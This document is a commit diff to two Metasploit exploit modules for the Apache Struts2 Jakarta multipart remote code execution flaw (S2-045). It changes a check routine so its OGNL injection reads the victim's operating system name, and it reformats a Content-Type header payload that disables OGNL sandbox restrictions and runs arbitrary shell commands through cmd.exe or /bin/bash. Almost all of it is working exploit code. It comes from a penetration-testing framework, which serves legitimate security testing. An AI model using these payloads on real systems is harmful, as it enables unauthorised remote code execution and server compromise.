Grab the os.name when checking

modules/exploits/multi/http/struts2_code_exec_jakarta.rb

@@ -87,11 +87,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check
     var_a = rand_text_alpha_lower(4)
-    var_b = rand_text_alpha_lower(4)
 
-    payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
+    payload = ""
-    payload << ".addHeader('#{var_a}', '#{var_b}')"
+    payload << %q|%{|
-    payload << "}.multipart/form-data"
+    payload << %q|(#_='multipart/form-data').|
+    payload << %q|(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).|
+    payload << %q|(#_memberAccess?|
+    payload << %q|(#_memberAccess=#dm):|
+    payload << %q|((#container=#context['com.opensymphony.xwork2.ActionContext.container']).|
+    payload << %q|(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).|
+    payload << %q|(#ognlUtil.getExcludedPackageNames().clear()).|
+    payload << %q|(#ognlUtil.getExcludedClasses().clear()).|
+    payload << %q|(#context.setMemberAccess(#dm)))).|
+    payload << %q|(#os=@java.lang.System@getProperty('os.name')).|
+    payload << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
+    payload << %q|}|
 
     begin
       resp = send_http_request(payload)
@@ -99,7 +109,8 @@ class MetasploitModule < Msf::Exploit::Remote
       return Exploit::CheckCode::Unknown
     end
 
-    if resp && resp.code == 200 && resp.headers[var_a] == var_b
+    if resp && resp.code == 200 && resp.headers[var_a]
+      print_good("Victim operating system: #{resp.headers[var_a]}")
       Exploit::CheckCode::Vulnerable
     else
       Exploit::CheckCode::Safe

modules/exploits/multi/http/struts2_s2045_rce.rb

@@ -47,7 +47,19 @@ class MetasploitModule < Msf::Exploit::Remote
     def execute_command(cmd, opts = {})
         uri =   normalize_uri( datastore['URI'] )
         headers ={
-            "Content-Type"=>"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
+            "Content-Type"=>
+"%{(#nike='multipart/form-data')."\
+"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."\
+"("\
+  "#_memberAccess?(#_memberAccess=#dm):"\
+  "("\
+    "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])."\
+    "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."\
+    "(#ognlUtil.getExcludedPackageNames().clear())."\
+    "(#ognlUtil.getExcludedClasses().clear())."\
+    "(#context.setMemberAccess(#dm)))"\
+  ")."\
+  "(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
         }
         data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
         print_status("Target URI: #{uri}")